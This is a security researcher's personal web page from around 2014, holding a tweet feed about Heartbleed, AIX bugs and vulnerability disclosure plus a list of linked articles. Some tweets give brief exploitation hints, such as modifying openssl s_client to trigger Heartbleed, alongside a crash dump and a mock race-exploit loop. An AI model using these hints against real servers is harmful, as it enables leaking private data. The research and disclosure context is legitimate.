www.machine.org.uk/meta:: Because shit does happen!

authors | contact | downloads | index | links | meta

[*] timb_machine: $londonscalling ++; @self->gameface(); # #brentfordfc

[*] timb_machine: $debiansec = @self + @portcullislabs; # Thanks to @sqshr, our internal Debian pen testing repo has been restarted

[*] timb_machine: @hackerfantastic Threat to disclose prompts first meaningful updates. 1 vendor will be dropping quite a lot of patches in May/June.

[*] timb_machine: @dwordj I'm kicking puppies, AIX doesn't have SEH. I like the idea though.

[*] timb_machine: Program received signal SIGSEGV, Segmentation fault. 2: /x $r4 = 0x41414141 1: /x $r0 = 0x41414141 # Things that go bang in the night!

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit For that particular bug I wouldn't even have bothered with the compiler.

[*] timb_machine: @hackerfantastic Lots more in the pipe line. /me pokes vendors.

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit I don't actually think I've seen either outside of @portcullislabs TBH.

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit I carry gdb and gcc with me for AIX.

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit Almost never, but cc is just as infrequent due to licensing. Falls back to /bin/sh, no?

[*] timb_machine: @InfosecEditor Pretty sure we (@portcullis) could oblige :)

[*] timb_machine: @jduck Looks good, mine arrived yesterday and I had a quick skim.

[*] timb_machine: RT @jperkin libsunw_ssl, or, how SmartOS avoids sadness. Comprehensive as always from Keith. http://dtrace.org/blogs/wesolows/2014/04/10/libsunw_ssl-or-how-smartos-avoids-sadness/

[*] timb_machine: if (fork()) { while (1) { sploit(); } else { raceme(); } } # Yo, $vendor, when you patch bug, best not to make the patch racey :) # bugfix

[*] timb_machine: @nmonkee Boo, so who do we need to impress this year for an invite :)

[*] timb_machine: @mwrlabs, @metasploit The AIX local PoC on http://cxsecurity.com/issue/WLB-2014040024 could reference https://labs.portcullis.co.uk/blog/in-the-lab-popping-cve-2013-4011-for-aix-7-1/ (not my bug, just my analysis)

[*] timb_machine: RT @dcuthbert The amount of people based in the UK scanning for vuln SSL servers is staggering. Brave, very brave especially with the CMA

[*] timb_machine: @BSidesLondon What's Internet access likely to be like for workshops?

[*] timb_machine: @charlesarthur In the former case, most modern browsers have ASLR, leaking browser memory is a common way to work out "R" in that equation.

[*] timb_machine: @charlesarthur Depends. Could make exploiting another bug easier. Could leak sensitive information from users current session.

[*] timb_machine: @aallan If the browser is linked against a vulnerable version of OpenSSL it won't have any choice.

[*] timb_machine: @aallan, @charlesarthur As to whether a) the browser will honour it and b) whether the browser's heartbeat implementation is vulnerable...

[*] timb_machine: @aallan, @charlesarthur Yes, I wrote one of the first hearbleed PoC. Took me about 15 minutes to trigger in either direction.

[*] timb_machine: @charlesarthur And when I say web site, I mean the underlying web server, heartbeat functionality isn't trivially exposed to web app devs.

[*] timb_machine: @charlesarthur If the *phone* has a bad version of OpenSSL, then a malicious web site could send heartbeat request to leak browser data.

[*] timb_machine: @self->collapse(); # Re-taming the garden after the winter!

[*] timb_machine: @kalilinux That's not at all how it came across.

[*] timb_machine: @kalilinux Curious as to whether you can enforce... http://en.wikipedia.org/wiki/Trademark#Enforcing_rights suggests maybe not.

[*] timb_machine: $life = $beer + $kebab + $brentfordfc; # Weekend fun

[*] timb_machine: @attritionorg, We've already shut up for the night, but I saw that email sneak through. Yet again, better than SLA :)

[*] timb_machine: @attritionorg Do the @OSVDB moderators never sleep? :)

[*] timb_machine: @iseezeroday Hand delivering to the NCC SF office? Nice touch. @portcullis directors delivered advisory beers to our US office last month.

[*] timb_machine: @pwni, @j0hn__f Who uses ASA anyway these days? :P

[*] timb_machine: @garyoleary MMMM, document.cookies.

[*] timb_machine: @mwrlabs Be good to see you, @portcullislabs has 2, @gsuberland is doing a crypto talk and I'm doing mobile sec without mentioning Drozer :P

[*] timb_machine: @dcuthbert Haven't looked at CheckSec but I gather it offers some of the same features :P

[*] timb_machine: @garyoleary Which PoC are you using?

[*] timb_machine: @digininja Having a reporting engine is your friend.

[*] timb_machine: @dive_monkey Gandi, good enough that I haven't left in ~10 years.

[*] timb_machine: @hackerfantastic "goto apple;" :)

[*] timb_machine: @OSVDB Better than your SLA *again*.

[*] timb_machine: @thegrugq butbut the Internet said it was malloc()

[*] timb_machine: @OSVDB Ta :)

[*] timb_machine: @osvdb Portcullis Computer Security Ltd (2379) is the same as Portcullis CSL (1136), cam someone fix the database :)

[*] timb_machine: @ericlaw This.

[*] timb_machine: @i0n1c Depends on your existing signal/noise ratio.

[*] timb_machine: @msuiche Agree about the constant usage. No wonder it has bugs.

[*] timb_machine: RT @gandibar Regenerate/replace our SSL certs for free. The old one will be auto revoked. Don't revoke unless you want to buy a new cert.

[*] timb_machine: $bugs ++; # I spy some public RPATH bugs :), kudos to @hpsecurity and boo to @bmcsoftware

[*] timb_machine: @McGrewSecurity .pl? ;)

[*] timb_machine: @Bugcrowd Mine, see 2-3 tweets back.

[*] timb_machine: @domchell Static content

[*] timb_machine: $patch ++; # The patch I wrote for openssl s_client to poke heartbleed: https://www.nth-dimension.org.uk/downloads.php?id=97

[*] s_client-vs-cve-2014-0160.diff.txt

[*] timb_machine: @mod0 Nice bug :)

[*] timb_machine: @domchell No non-public content to steal, but we've patched and will be replacing our certs.

[*] timb_machine: @singe, @jcran Change payload length, // the assert and change the length of the send (as alluded to here: http://www.reddit.com/r/netsec/comments/22gaar/heartbleed_attack_allows_for_stealing_server/cgmm7rt)

[*] timb_machine: @Gunther_AR http://www.reddit.com/r/netsec/comments/22gaar/heartbleed_attack_allows_for_stealing_server/cgmm7rt < short version

[*] timb_machine: @FredericJacobs, @ioerror 3 line patch.

[*] timb_machine: @ex509 Inclined to agree.

[*] timb_machine: @sqshr Butbut, you run Arch, surely you're running vulnerable code?

[*] timb_machine: @sqshr My PoC triggers differing behaviour on patched openssl-1.0.1g vs 1.0.1f. Almost certainly working. Took ~10 minutes to figure it out.

[*] timb_machine: $heartbleed ++ ; # Anybody got a confirmed patched server?

[*] timb_machine: $hacknight ++; # Spent the evening taking @eventilt and @etamotweet through some mobile app sec in prep for @BSidesLondon

[*] timb_machine: @wimremes Gentoo with a hardened profile.

[*] timb_machine: @__Freakyclown__, @n0x00, @nmonkee Well you know who is writing it?...

[*] timb_machine: @nickjhayes Hilarious. Hilarious.

[*] timb_machine: @nickjhayes Trollalolacoptor. Quiet web site man.

[*] timb_machine: @sqshr Very bad person, very very bad person.

[*] timb_machine: @nickjhayes, @sqshr return ENOSKILLS;

[*] timb_machine: @nickjhayes, @sqshr .NET or something else?

[*] timb_machine: @sqshr, @nickjhayes A very bad person.

[*] timb_machine: @0wasp On AIX, TCB/TE as appropriate. TACF will also do it on UNIXs more generally.

[*] timb_machine: @n0x00, @nmonkee Hah!

[*] timb_machine: @_larry0 Best of luck. I look forward to seeing more advisories in due course.

[*] timb_machine: @n0x00, @nmonkee Logos cost.

[*] timb_machine: @gsuberland You had a bug, I killed it, what's not to like. Okay, maybe I should have used SIGHUP...

[*] timb_machine: kill("KILL", @gsuberland); # BUGFIX

[*] timb_machine: @midnite_runr (speaking as a UNIX kernel geek)

[*] timb_machine: @midnite_runr Yeh. I just wouldn't consider that to be anything like how setuid binaries work.

[*] timb_machine: @schrotthaufen Doesn't that require either a reauth or an account that is already effectively Administrator?

[*] NDSA20140311.txt.asc

[*] SAP Transaction Codes

[*] Patch to x3270 to make it ignore protected fields, and allow them to be modified. This provided some significant pwnage on an assessment where the mainframe (IMS) application appeared to pass the username from one field to another. I'm still researching

[*] security - Exploitable PHP functions - Stack Overflow

[*] Retargetable Decompiler

[*] Rechenzentrum Kreuznach - die AS/400-Profis

[*] Configuration of hidden Sendmail SSL/TLS connection options « TriathlonMike

[*] Native Extensions for Perl without Smoke and Mirrors

[*] Deconstructing the Azure Point-to-Site VPN for Command Line usage - Diary Of A Ninja

[*] Volatile Minds

[*] Cryptographic flaws in Oracle Database authentication protocol | Marcel's Blog

[*] OpenPGP Best Practices - Privacy and Authenticity Ou... - Riseup Labs - Groups - we.riseup.net

[*] HOWTO: Linux NAT in Four Steps using iptables

[*] Project Ouroboros — Reflashing a betemcu USBasp Programmer | Jonathan Thomson's web journal

[*] A brief look at the Acer ChromeBook #2

[*] A brief look at the Acer ChromeBook #1

[*] Dead bugs society

[*] A brief look at the RIM PlayBook

[*] Breaking cpau, a dummies guide

[*] Bypassing the Android pattern lock

[*] Introducing VulnApp

[*] Exploiting the Linux linker

[*] Dumping Samba hashes

[*] Defcon 18 CTF qualifiers: who is the h4x13st h4x0r of them all

© www.machine.org.uk Web Master, 2006
[del.icio.us - Post this page to del.icio.us] [twitter - Post this page to twitter]